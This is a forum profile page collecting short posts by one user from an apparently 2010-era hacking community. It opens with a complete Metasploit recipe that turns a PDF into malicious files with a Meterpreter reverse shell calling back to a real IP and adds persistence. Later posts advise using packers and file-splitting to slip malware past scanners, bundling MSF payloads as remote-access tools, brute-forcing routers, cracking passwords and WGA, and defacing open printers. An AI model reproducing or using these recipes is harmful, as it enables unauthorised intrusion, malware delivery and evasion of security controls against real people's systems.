operat0r_001
Posts: 327
Days Won: 1
Posts posted by operat0r_001
example output: http://rmccurdy.com/scripts/msf_shells/
Metasploit auxiliary file_autopwn module - Video Tutorial
http://www.backtrack-linux.org/forums/back...o-tutorial.html
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3
wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressReleases...es/nga10_02.pdf
./msfconsole
db_driver sqlite3
db_create pentest11
# setting the LHOST to non IP can cause issues
setg LHOST 75.139.158.51
setg LPORT 21
# I just need the files, I don't care if the http server ever runs ..
setg SRVPORT 21
# default is 3333
setg LPORT_WIN32 21
setg INFILENAME /tmp/file3.pdf
use auxiliary/server/file_autopwn
set OUTPATH /tmp/1
set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run
-
Let me know if you need any help. rmccurdy.com runs FreeBSD .. OpenBSD is good for firewalls/VPN etc
-
I don't play any of them .. everybody cheats in those ..
-
My personal wordlist :)
ADDED 2.3GIG wordlist
* theargonlistver2_wordlist.zip (83meg) > .rar(154meg) > .lst ( plain text 1.9gigs)
* ran john on it and sort and uniq
* results in 2.3G wordlist no dupes
* DOWNLOAD:
-
first off it needs to run as system ... so you would need to use something like:
http://rmccurdy.com/scripts/procexp%20as%20system.exe
or
http://rmccurdy.com/scripts/RUNAS_SYSTEM.vbs ( xp )
I would start over and use something like the getcountermeasure script and work backward to a .bat:
http://www.google.com/search?q=metasploit++getcountermeasure
http://rmccurdy.com/scripts/quickclean.txt ( some M$ batch foo )
-
NMAP FOR ANDROID CROSS COMPILE ARM
# from android root prompt
wget http://rmccurdy.com/nmap.sh
sh nmap.sh
cd /data/local/bin
nmap -v -iR 50 -PN -p 80 -n -A
This MAY work for other platforms but tested on CyanogenMod as of 2/18/2010 on
Android G1; plan to APK package this up with other security tools,
ruby/metasploit etc ..
• SYN scans may not REALLY be working ... along with other 'features' of nmap ..
• Copy everything in http://rmccurdy.com/stuff/G1/BINS/NMAP/ to
/data/local/bin on the Android and cd /data/local/bin
• You may need to 'mount -o remount / /' and put sh or bash ( the busybox bash ) in /bin/sh
• Or alternatively export SHELL=/system/bin/sh may work ..
• http://delicious.com/operat0r/android reference
• Some tips for cross compiling:
- Start simple! bash or 'hello world'
- Make sure the file is ARM / STATIC
nmap: ELF 32-bit LSB executable, ARM, version 1 (SYSV), for GNU/Linux 2.6.14, statically linked, not stripped
- If you get 'not found' it may be the /bin/sh issue or missing libs
- You can use strace and gdb from my site or http://ortegaalfredo.googlepages.com/android
-
For nmap and others I had to pre-compile the libs and/or hack up the
configure and/or make file, so if something fails try to compile each
lib in the folder, taking it folder by folder.
EXAMPLE OUTPUT:
uname -a
Linux localhost 2.6.29.6-cm42 #11 PREEMPT Sun Jan 3 23:10:50 EST 2010 armv6l GNU/Linux
#
Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2010-02-18 19:04 UTC
Warning: OS detection will be MUCH less reliable because we did not find at least 1 open and 1 closed TCP port
Interesting ports on diecastaircraftshop.com (63.249.18.249):
PORT STATE SERVICE VERSION
21/tcp open tcpwrapped
25/tcp open smtp?
80/tcp open http Microsoft IIS webserver 7.0
443/tcp open https?
Device type: general purpose
Running (JUST GUESSING) : FreeBSD 5.X (85%)
Aggressive OS guesses: FreeBSD 5.3-STABLE (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime 43.977 days (since Tue Jan 5 19:39:44 2010)
Service Info: OS: Windows
Nmap finished: 1 IP address (1 host up) scanned in 141.397 seconds
#
MINI HOWTO:
# you need sun-java5-jdk
echo 'deb http://us.archive.ubuntu.com/ubuntu/ jaunty multiverse' >> /etc/apt/sources.list
echo 'deb http://us.archive.ubuntu.com/ubuntu/ jaunty-updates multiverse ' >> /etc/apt/sources.list
apt-get update
apt-get install build-essential -y
apt-get install m4 -y
aptitude install git-core git jfsutils xfsprogs quota isdnutils-base nfs-common oprofile -y
apt-get install sun-java5-jdk -y
# toolchain for cross compile
http://zenmachine.wordpress.com/cross-comp...not-so-zen-way/
http://android-dev.g.hatena.ne.jp/takuma104/
# download nmap-4.01.tar.gz
# precompile dftables:
#   cd ./libpcre/ ; ./configure ; make ; cp dftables /usr/local/sbin/
# make clean and cp /usr/local/sbin/dftables ./libpcre/
# precompile libpcap; I got libpcap-0.7.1 to compile OK for ARM
#   ( '--with-libpcap=/home/operat0r/libpcap-0.7.1/' ; change to your path )
# before you make, vi the main Makefile and set STATIC = -static
# my last line after make looked like:
arm-none-linux-gnueabi-g++ -Llibpcap -Lnbase -Lnsock/src/ -static -o nmap main.o \
  nmap.o targets.o tcpip.o nmap_error.o utils.o idle_scan.o osscan.o \
  output.o scan_engine.o timing.o charpool.o services.o protocols.o \
  nmap_rpc.o portlist.o NmapOps.o TargetGroup.o Target.o \
  FingerPrintResults.o service_scan.o NmapOutputTable.o MACLookup.o tty.o \
  nmap_dns.o -lnbase -lnsock libpcre/libpcre.a -lpcap \
  libdnet-stripped/src/.libs/libdnet.a -lm
export ac_cv_linux_vers=2.6.31
# the value must be quoted: unquoted, "-static" is parsed as a second argument to export
export CC="/usr/local/arm-2008q3/bin/arm-none-linux-gnueabi-gcc -static"
export LD=/usr/local/arm-2008q3/bin/arm-none-linux-gnueabi-ld
export AR=/usr/local/arm-2008q3/bin/arm-none-linux-gnueabi-ar
export RANLIB=/usr/local/arm-2008q3/arm-none-linux-gnueabi/bin/ranlib
export PATH=$PATH:/usr/local/arm-2008q3/bin
export PATH=$PATH:/usr/local/arm-2008q3/
export PATH=$PATH:/usr/local/arm-2008q3/lib
export ac_cv_func_getpgrp_void=yes
export ac_cv_func_setpgrp_void=yes
./configure --host=arm-none-linux-gnueabi --target=arm-none-linux-gnueabi \
  --with-libpcap=/home/operat0r/libpcap-0.7.1/ --without-nmapfe \
  --with-pcap=linux
-
Video Download Capture portable
Replay Media Catcher portable
MediaCoder portable
http://rapidshare.com/files/335751302/Vide....0_portable.exe
http://rapidshare.com/files/336245780/Repl...tcher_v3.11.zip
http://rapidshare.com/files/338371999/Medi...82_portable.exe
ready for USB 1337ness
-
No and no ?? it's not a theory ... usboot.org .. you would only need to remember the WPA key, and the WGA can be cracked easily. This has been tested on 4 different desktops and 5 different laptops. I can only assume you need to keep the original IMAGE because it's installing drivers every time you change the system, and I assume that would cause problems eventually, but none for me so far. I got a blue screen but it worked fine on reboot for one of the desktops.
-
* don't patch the wii !
* find out what version you've got; 4.2 is what I am running
* http://delicious.com/operat0r/wii
http://rmccurdy.com/stuff/wii2/ for 4.2 .. this will give you an idea .. of what you need
http://rmccurdy.com/stuff/wii older wii stuff
be sure to also add the Preloader for if and WHEN you brick your wii :)
-
windows XP SP3 installed to USB usboot with NIC and WIFI driverpacks
*** THIS IS NOT BART,ERD OR UBCD4WIN ETC THIS IS A REAL FULL XP PRO SP3 INSTALLED AND BOOTING FROM USB DRIVE ***
This is working and tested USB boot image using partimage
* get a 4gig or higher usb drive
* download RMPrepUSB and format fat32 with boot
* make sure you can boot from the USB device
* extract the zip using 7-zip.org etc
* use partimage to dump the ~2 gig image to the usb drive etc
* http://www.sysresccd.org/Screenshots for partimage if you do not have it also on Backtrack or any number of live linux distros
this is how I did it thank usboot.org
* the host machine MUST have an NTFS partition on it for this to work; it uses drive shadowing etc to clone the C:
* made sure the USB drive was bootable
* formatted the USB drive FAT32 not on VMware but on the host machine
* did base install of my windows XP with driverpacks on a VM
* extract the NIC and WIFI drivers from driverpacks.net
* ran phase 1-3 ok on the VM
* you can even put this on cell phone and boot windows from minisd etc .. :)
* the image can be pushed and booted in under 4min on a USB or HDD for a quick hack
rmccurdy.com/usboot.txt
- operat0r - rmccurdy.com
-
* try a different box
* buy some contact cleaner, it's like WD-40 but for tronics :)
* http://delicious.com/operat0r/backtrack ( look for USB )
-
random psycho babble
* not sure but something about flash media over say 8gigs is 'different' maybe <8 is flash and >8 is 'removable disk' I just have had issues with boot/etc with larger flash drives
* as far as USB forensics for windows I use HandyRecovery.exe, GetDataBack for NTFS portable.exe, GetDataBack for FAT portable.exe (PhotoRec - CGSecurity)
* also look into dd_rhelp but normally flash works or does not so it's more a matter of what tools to aim at it than reading from it with IDE/SATA; you can buy PCI cards that can read at a lower level
* for more info pop it in a *nix box and google the device it picks up
to answer your Q: look into WMI you can monitor and query event logs etc anything ... you could
-
you can do this with ping yahoo.com and error levels ( exit codes for *nix users )
http://www.robvanderwoude.com/errorlevel.php
:loop
Timeout.exe 30
ping yahoo.com
if errorlevel 1 goto restartvnc
Timeout.exe 30
goto loop
:restartvnc
REM restart VNC here (the post does not give the command), then return to the loop
goto loop
something like that
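The same watchdog written for *nix, as the post's "exit codes for *nix users" aside suggests. This is an added example, not part of the post: it probes a host once per interval and, when the probe fails, runs a restart command supplied by the caller (the post never shows what the restartvnc step does). Assumptions not in the post: Linux iputils ping flags -c and -W (flag names differ on BSD/macOS), and a hypothetical optional probe-command parameter so the logic can be exercised offline.

```shell
#!/bin/sh
# Connectivity watchdog in POSIX sh, driven by exit codes instead of ERRORLEVEL.
# Added example, not from the post. Assumes iputils ping (-c count, -W seconds).

# Probe a host once; exit status 0 means a reply came back, nonzero means not.
probe_host() {
    ping -c 1 -W 2 "$1" >/dev/null 2>&1
}

# One watchdog iteration.
#   $1 = host to probe
#   $2 = restart command, run via sh -c when the probe fails
#   $3 = probe command (optional; hypothetical override used for testing,
#        defaults to probe_host)
# Returns 0 if the host answered, 1 if it did not and the restart command ran,
# 2 if the restart command itself failed.
watchdog_step() {
    host=$1
    restart_cmd=$2
    probe=${3:-probe_host}

    if "$probe" "$host"; then
        return 0
    fi
    # Log to stderr with a timestamp so the event shows up in cron mail / syslog.
    echo "$(date '+%Y-%m-%d %H:%M:%S') $host unreachable, running: $restart_cmd" >&2
    if sh -c "$restart_cmd"; then
        return 1
    fi
    echo "$(date '+%Y-%m-%d %H:%M:%S') restart command failed" >&2
    return 2
}

# Run forever: $1 = host, $2 = seconds between probes, $3 = restart command.
watchdog_loop() {
    while :; do
        watchdog_step "$1" "$3" || :   # a failed step must never end the loop
        sleep "$2"
    done
}

# Usage (not run automatically):
#   watchdog_loop yahoo.com 30 'service vncserver restart'
```

A failed ping to a public host can just as well mean an upstream outage as a dead VNC service, so the restart command should be safe to repeat every interval, and the stderr log lines are what let you tell the two apart afterwards.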
-
if the ssid is the same as the factory default, likely he has never even logged into it .. if not default try xhydra and friends to brute force it with a small wordlist
-
noobs
http://74.125.47.132/search?q=cache:f8ldos...lient=firefox-a
I remember an article about Macs and HID on flash drives allowing FORCE autorun type of shenanigans ?? is there such a thing for Windows ? (not autorun.inf)
-
just google rat or "remote access tool" also google on splitting files to circumvent malware scanners or ( packers ) or just write your own using MSF and bundle it with something
-
Hijetter.exe great for open HP printers :)
* replace the error message with "please deposit $.25 to complete print job"
-
this is a retarded thread ... and I am hijacking it to replace it with useful info ..:
* http://www.wpacracker.com/cracker/upload
* http://cracker.offensive-security.com/
* http://www.md5decrypter.co.uk/
* http://www.freerainbowtables.com/en/download/
* http://rmccurdy.com/scripts/packetstorm_dic_john_1337.tar.gz
* http://forums.remote-exploit.org/pentestin...e-wordlist.html
-
go to my site, play with the portable download :) skiddie powers activate ! learn a programming lang, the rest will come
-
giganews/ssl + truecrypt = DONE
15$ a month charge it to yer moms CC
-
Episode 6x14
in Hak5
you need to say something about DNS .. most schools block via DNS so you can tunnel all you want .. DNS still goes over the local LAN.
* about:config fwd dns
* also say something about PortaPutty and Portable Firefox
-
11/12/2009 - UPDATED/FIXED feeds.rmccurdy.com - 30 feeds ( to be added secunia.com if I can )
http://www.securityfocus.com/rss/vulnerabilities.xml
http://seclists.org/rss/bugtraq.rss
http://seclists.org/rss/fulldisclosure.rss
http://seclists.org/rss/pen-test.rss
http://seclists.org/rss/incidents.rss
http://seclists.org/rss/dailydave.rss
http://seclists.org/rss/webappsec.rss
http://seclists.org/rss/vulnwatch.rss
http://feeds.feedburner.com/HelpNetSecurity
http://www.us-cert.gov/channels/alerts.rdf
http://www.us-cert.gov/channels/techalerts.rdf
http://www.kb.cert.org/vuls/atomfeed?OpenV...=1&count=30
http://www.net-security.org/dl/bck/vuln.rss
http://news.securitytracker.com/server/aff...1D319BD39309004
http://feeds.feedburner.com/darknethackers
http://feeds.feedburner.com/schneier/fulltext
http://www.professionalsecuritytesters.org/backend.php
http://www.f-secure.com/weblog/weblog.rss
http://www.gossamer-threads.com/lists/full...-disclosure.xml
http://feeds.feedburner.com/Vitalsecurity-org
http://taosecurity.blogspot.com/feeds/posts/default
http://securityvulns.com/informer/rss.asp
http://www.vupen.com/exploits.xml
http://osvdb.org/feed/vulnerabilities/latest.rss
http://rmccurdy.com/scripts/vupen-security.rss
http://rmccurdy.com/scripts/vupen-linux.rss
http://feeds.feedburner.com/SansInstituteA...kAll?format=xml
http://feedity.com/rss.aspx/ath-cx/UldUWlFU
http://www.securinfos.info/english/securit...-advisories.xml
Force Applications To Use A Proxy
in Questions
set IE proxy settings; that will do for most apps ... they use the API or whatnot for IE. Other than that you will need to set up a transparent proxy; google "squid transparent proxy"